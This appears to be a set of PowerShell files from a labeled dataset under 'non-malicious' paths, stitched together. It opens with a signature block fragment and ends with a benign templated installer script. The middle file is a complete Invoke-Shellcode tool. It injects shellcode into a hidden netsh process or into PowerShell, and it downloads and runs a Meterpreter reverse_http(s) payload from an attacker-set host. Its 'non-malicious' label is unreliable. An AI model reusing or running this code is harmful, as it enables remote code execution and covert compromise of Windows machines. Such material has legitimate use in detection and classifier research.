MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAMATzg6R/A0ldO7M # qGxD1VJji5yVA1hHb0Hc0Yjtv7WkxQ8iwfflulX5Us64tD3+3NT1JkphWzaAWf2w # KdAw35RxtQG1iON3HEZ0X23nde4Kg/Wfbx5rEHkZ9bzKnR/2N5A16+w/1pbwJzdf # RcnJT3cLyawr/kYjMWd63OP0Glq70ua4WUE/Po5pU7rQRbWEoQozY24hAqOcwuRc # m6Cb0JBeTOCeRBntEKgjKep4pRaQt7b9vusT97WeJcfaVosmmPtsZsawgnpIjbBa # 55tHfuk0vDkZtbIXjU4mr5dns9dnanBdBS2PY3N3hIfCPEOszquwHLkfkFZ/9bxw # 8/eRJldtoukHo16afE/AqP/smmGJh5ZR0pmgW6QcX+61rdi5kDJTzCFaoMyYzUS0 # SEbyrDZ/p2KOuKAYNngljiOlllct0uJVz2agfczGjjsKi2AS1WaXvOhgZNmGw42S # FB1qaloa8Kaux9Q2HHLE8gee/5rgOnx9zSbfVUc7IcRNodq6R7v+Rz+P6XKtOgyC # qW/+rhPmp/n7Fq2BGTRkcy//hmS32p6qyglr2K4OoJDJXxFs6lwc8D86qlUeGjUy # o7hVy5VvyA+y0mGnEAuA85tsOcUPlzwWF5sv+B5fz35OW3X4Spk5SiNulnLFRPM5 # XCsSHqvcbC8R3qwj2w1evPhZxDuNMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjox # NzlFLTRCQjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAbfPR1fBX6HxYfyPx8zYzJU5fIQyggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnv9IIwIhgPMjAyNDA1MTYxMDU3MDZaGA8yMDI0MDUxNzEwNTcwNlowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6e/0ggIBADAHAgEAAgINZTAHAgEAAgISozAKAgUA # 6fFGAgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAGNc4u32nuIXgxHNYkcO # 2JhScVkrRtgJY2+S/5AvC0pqv867my7BJTvEwCxcT1Cbmg7CqtM8ZjjTX4Hz2bRH # KH/PDcQ1q5CgNKnH1v48ze0qiC10uL1q6557TRJL2kCJcuWSYFiNZFPjN8Ae7AMf # ayMCOInnQzq1zVQ58dhbcHO+MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHg1PwfExUffl0AAQAAAeAwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgiSAywNHcz2Ptw9MtYLFAoVwW5+O3foAT+0Zu5vyBzBgwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCDj7lK/8jnlbTjPvc77DCCSb4TZApY9nJm5whsK/2kK # wTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4NT8 # HxMVH35dAAEAAAHgMCIEIBmv6hOpkdy42CPf1nZP66TBcGvnZwDhfckDfiFvOOm5 # MA0GCSqGSIb3DQEBCwUABIICABJWFgBjuZsdr7TWTeM9K5N9uqOUvNijrMPD71gu # Wcut+ne3cMF5VHTZ9832lDC5bm7uFhuVE01+Vc64vhAPI6WCHgsK5YwFZm/mJpMY # 37UMVSL+sPjd4d4SVydT1cYff2X0zLa/nXEXAnssJDUeIslOfQpB5SVWbYmN3zdP # PL9M9iD3DPJRWDXBNchG1lA9fmLsHp5yTZU8u5/YS3WTxobCasVQ0Xqm6NB5+ABV # CPvJXEwdmGMdwe9srY+qNKnOnyhukFF25xlJHV7GMwhyWeQpa2oMlJVjgPj5jq8s # ddGIQpuM2CO+/rCrSqSD90PKMbdcOZ2zhst+XvlDJxIPUYPtidqb0Bkav20gzUwx # jTHao4skr02UKqkvYM60pqGuN8QAMWzPEmQCcRwCDfrKT8Hdh14HJNcNvnrRXQAg # Ze8LJ999C3SAY3psfe2Ix7bwjkZq5bUpF7uqJHdwHygQWP1rVUZOaHdSwRfjwOT1 # APZsKup4wkd94Sl1VEGmFnAdx7xs4HX36AzbymV3kBilI7W4m5CpxTK7Jp2d7ULK # FigcU3n1TL1CsVpZy/oF+0NnlIjmR6YPWP3gDaNOw4lAtrc4AM7xcL0gciI1WyfA # yuAnxV07TD3nSwG2hSJVzaveEbWH/6ruUiVSaAUZgm8e6aggoIRJGnvsz3Lzm60T # XrKv # SIG # End signature block
combined_dataset/train/non-malicious/4252.ps1
4252.ps1
function Invoke-Shellcode { [CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param ( [ValidateNotNullOrEmpty()] [UInt16] $ProcessID, [Parameter( ParameterSetName = 'RunLocal' )] [ValidateNotNullOrEmpty()] [Byte[]] $Shellcode, [Parameter( ParameterSetName = 'Metasploit' )] [ValidateSet( 'windows/meterpreter/reverse_http', 'windows/meterpreter/reverse_https', IgnoreCase = $True )] [String] $Payload = 'windows/meterpreter/reverse_http', [Parameter( ParameterSetName = 'ListPayloads' )] [Switch] $ListMetasploitPayloads, [Parameter( Mandatory = $True, ParameterSetName = 'Metasploit' )] [ValidateNotNullOrEmpty()] [String] $Lhost = '127.0.0.1', [Parameter( Mandatory = $True, ParameterSetName = 'Metasploit' )] [ValidateRange( 1,65535 )] [Int] $Lport = 8443, [Parameter( ParameterSetName = 'Metasploit' )] [ValidateNotNull()] [String] $UserAgent = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').'User Agent', [Parameter( ParameterSetName = 'Metasploit' )] [ValidateNotNull()] [Switch] $Legacy = $False, [Parameter( ParameterSetName = 'Metasploit' )] [ValidateNotNull()] [Switch] $Proxy = $False, [Switch] $Force = $False ) Set-StrictMode -Version 2.0 if ($PsCmdlet.ParameterSetName -eq 'ListPayloads') { $AvailablePayloads = (Get-Command Invoke-Shellcode).Parameters['Payload'].Attributes | Where-Object {$_.TypeId -eq [System.Management.Automation.ValidateSetAttribute]} foreach ($Payload in $AvailablePayloads.ValidValues) { New-Object PSObject -Property @{ Payloads = $Payload } } Return } if ( $PSBoundParameters['ProcessID'] ) { Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null } else { $pst = New-Object System.Diagnostics.ProcessStartInfo $pst.WindowStyle = 'Hidden' $pst.UseShellExecute = $False $pst.CreateNoWindow = $True if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){ $pst.FileName = "C:\Windows\System32\netsh.exe" } else { $pst.FileName = "C:\Windows\Syswow64\netsh.exe" } $Process = [System.Diagnostics.Process]::Start($pst) [UInt16]$NewProcID = ($Process.Id).tostring() $ProcessID = $NewProcID $PSBoundParameters['ProcessID'] = $NewProcID Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null } function Local:Get-DelegateType { Param ( [OutputType([Type])] [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), [Parameter( Position = 1 )] [Type] $ReturnType = [Void] ) $Domain = [AppDomain]::CurrentDomain $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') Write-Output $TypeBuilder.CreateType() } function Local:Get-ProcAddress { Param ( [OutputType([IntPtr])] [Parameter( Position = 0, Mandatory = $True )] [String] $Module, [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure ) $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } function Local:Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture) { $IntSizePtr = $Architecture / 8 function Local:ConvertTo-LittleEndian ([IntPtr] $Address) { $LittleEndianByteArray = New-Object Byte[](0) $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } } [System.Array]::Reverse($LittleEndianByteArray) Write-Output $LittleEndianByteArray } $CallStub = New-Object Byte[](0) if ($IntSizePtr -eq 8) { [Byte[]] $CallStub = 0x48,0xB8 $CallStub += ConvertTo-LittleEndian $BaseAddr $CallStub += 0xFF,0xD0 $CallStub += 0x6A,0x00 $CallStub += 0x48,0xB8 $CallStub += ConvertTo-LittleEndian $ExitThreadAddr $CallStub += 0xFF,0xD0 } else { [Byte[]] $CallStub = 0xB8 $CallStub += ConvertTo-LittleEndian $BaseAddr $CallStub += 0xFF,0xD0 $CallStub += 0x6A,0x00 $CallStub += 0xB8 $CallStub += ConvertTo-LittleEndian $ExitThreadAddr $CallStub += 0xFF,0xD0 } Write-Output $CallStub } function Local:Inject-RemoteShellcode ([Int] $ProcessID) { $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) if (!$hProcess) { Throw "Unable to open a process handle for PID: $ProcessID" } $IsWow64 = $false if ($64bitCPU) { $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null if ($IsWow64) { if ($Shellcode32.Length -eq 0) { Throw 'No shellcode was placed in the $Shellcode32 variable!' } $Shellcode = $Shellcode32 Write-Verbose 'Injecting into a Wow64 process.' Write-Verbose 'Using 32-bit shellcode.' } else { if ($Shellcode64.Length -eq 0) { Throw 'No shellcode was placed in the $Shellcode64 variable!' } $Shellcode = $Shellcode64 Write-Verbose 'Using 64-bit shellcode.' } } else { if ($Shellcode32.Length -eq 0) { Throw 'No shellcode was placed in the $Shellcode32 variable!' } $Shellcode = $Shellcode32 Write-Verbose 'Using 32-bit shellcode.' } $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) if (!$RemoteMemAddr) { Throw "Unable to allocate shellcode memory in PID: $ProcessID" } Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))" $WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.Length, [Ref] 0) | Out-Null $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread if ($IsWow64) { $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32 Write-Verbose 'Emitting 32-bit assembly call stub.' } else { $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64 Write-Verbose 'Emitting 64-bit assembly call stub.' } $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) if (!$RemoteStubAddr) { Throw "Unable to allocate thread call stub memory in PID: $ProcessID" } Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))" $WriteProcessMemory.Invoke($hProcess, $RemoteStubAddr, $CallStub, $CallStub.Length, [Ref] 0) | Out-Null $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero) if (!$ThreadHandle) { Throw "Unable to launch remote thread in PID: $ProcessID" } $CloseHandle.Invoke($hProcess) | Out-Null Write-Verbose 'Shellcode injection complete!' } function Local:Inject-LocalShellcode { if ($PowerShell32bit) { if ($Shellcode32.Length -eq 0) { Throw 'No shellcode was placed in the $Shellcode32 variable!' return } $Shellcode = $Shellcode32 Write-Verbose 'Using 32-bit shellcode.' } else { if ($Shellcode64.Length -eq 0) { Throw 'No shellcode was placed in the $Shellcode64 variable!' return } $Shellcode = $Shellcode64 Write-Verbose 'Using 64-bit shellcode.' } $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) if (!$BaseAddress) { Throw "Unable to allocate shellcode memory in PID: $ProcessID" } Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))" [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length) $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread if ($PowerShell32bit) { $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32 Write-Verbose 'Emitting 32-bit assembly call stub.' } else { $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64 Write-Verbose 'Emitting 64-bit assembly call stub.' } $CallStubAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x40) if (!$CallStubAddress) { Throw "Unable to allocate thread call stub." } Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))" [System.Runtime.InteropServices.Marshal]::Copy($CallStub, 0, $CallStubAddress, $CallStub.Length) $ThreadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntPtr]::Zero) if (!$ThreadHandle) { Throw "Unable to launch thread." } $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null Write-Verbose 'Shellcode injection complete!' } $IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process if ($IsWow64ProcessAddr) { $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) $64bitCPU = $true } else { $64bitCPU = $false } if ([IntPtr]::Size -eq 4) { $PowerShell32bit = $true } else { $PowerShell32bit = $false } if ($PsCmdlet.ParameterSetName -eq 'Metasploit') { $Response = $True if ( $Force -or ( $Response = $psCmdlet.ShouldContinue( "Do you know what you're doing?", "About to download Metasploit payload '$($Payload)' LHOST=$($Lhost), LPORT=$($Lport)" ) ) ) { } if ( !$Response ) { Return } switch ($Payload) { 'windows/meterpreter/reverse_http' { $SSL = '' } 'windows/meterpreter/reverse_https' { $SSL = 's' [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True} } } if ($Legacy) { $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM" Write-Verbose "Requesting meterpreter payload from $Request" } else { $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_} $SumTest = $False while ($SumTest -eq $False) { $GeneratedUri = $CharArray | Get-Random -Count 4 $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92) } $RequestUri = -join $GeneratedUri $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)" } $Uri = New-Object Uri($Request) $WebClient = New-Object System.Net.WebClient $WebClient.Headers.Add('user-agent', "$UserAgent") if ($Proxy) { $WebProxyObject = New-Object System.Net.WebProxy $ProxyAddress = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyServer if ($ProxyAddress) { $WebProxyObject.Address = $ProxyAddress $WebProxyObject.UseDefaultCredentials = $True $WebClientObject.Proxy = $WebProxyObject } } try { [Byte[]] $Shellcode32 = $WebClient.DownloadData($Uri) } catch { Throw "$($Error[0].Exception.InnerException.InnerException.Message)" } [Byte[]] $Shellcode64 = $Shellcode32 } elseif ($PSBoundParameters['Shellcode']) { [Byte[]] $Shellcode32 = $Shellcode [Byte[]] $Shellcode64 = $Shellcode32 } if ( $PSBoundParameters['ProcessID'] ) { $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr]) $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]) $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate) $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate) $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) Write-Verbose "Injecting shellcode into PID: $ProcessId" if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) ) { Inject-RemoteShellcode $ProcessId } } else { $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]) $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool]) $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread $CreateThreadDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int]) $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) Write-Verbose "Injecting shellcode into PowerShell" if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', "Injecting shellcode into the running PowerShell process!" ) ) { Inject-RemoteShellcode $ProcessId } } }
combined_dataset/train/non-malicious/sample_38_45.ps1
sample_38_45.ps1
function Unzip-Product { if (-Not (Test-Path -Path "\$PSScriptRoot/version.txt")) { \$actualVersion = "" } else { \$actualVersion = Get-Content -Path "\$PSScriptRoot/version.txt" -Raw } if (\$actualVersion -ne "${version}") { Write-Host -NoNewline "Unzipping... " Expand-Archive -Path "\$PSScriptRoot/install.zip" -DestinationPath "\$PSScriptRoot/" -Force Write-Host "Done" } } Write-Host "Launching installation..." Write-Host "Preparing" #foreach( $fileToDelete in $filesToDelete ) Write-Host "Removing ${fileToDelete}" if (Test-Path -Path "\$PSScriptRoot/${fileToDelete}") { Remove-Item -Recurse -Force \$PSScriptRoot/${fileToDelete} } #end Write-Host "Unzip product" Unzip-Product Write-Host "Configure product" if (Test-Path -Path "\$PSScriptRoot/Config/Tools/consulting/install-all.ps1") { if (\$IsLinux) { & chown "-R" ${environment.filesUser}:${environment.filesGroup} \$PSScriptRoot & chmod "-R" "u=rX,g=rX,o=" \$PSScriptRoot & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Public/clients/Graphic & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Log & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Config & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Cache & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Public/Cache & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Uploads } \$errors = . "\$PSScriptRoot/Config/Tools/consulting/install-all.ps1" if (\$errors.Length -eq 0) { Write-Host "Installation successful" } else { \$host.ui.WriteErrorLine("The following errors have been encountered :") foreach (\$e in \$errors) { \$host.ui.WriteErrorLine(" - " + \$e.Message) } \$host.ui.WriteErrorLine("`nPlease, fix problems and relaunch installation") exit 1 } if (\$IsLinux) { & chown "-R" ${environment.filesUser}:${environment.filesGroup} \$PSScriptRoot & chmod "-R" "u=rX,g=rX,o=" \$PSScriptRoot & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Public/clients/Graphic & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Log & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Config & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Cache & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Public/Cache & chmod -R "u=rwX,g=rwX,o=" \$PSScriptRoot/Uploads } } else { if (\$IsLinux) { & chown "-R" ${environment.filesUser}:${environment.filesGroup} \$PSScriptRoot & chmod "-R" "u=rX,g=rX,o=" \$PSScriptRoot } } if (\$IsLinux) { & bash -c "find \$PSScriptRoot -type d -exec chmod g+s {} \\;" }
combined_dataset/train/non-malicious/sample_50_69.ps1
sample_50_69.ps1
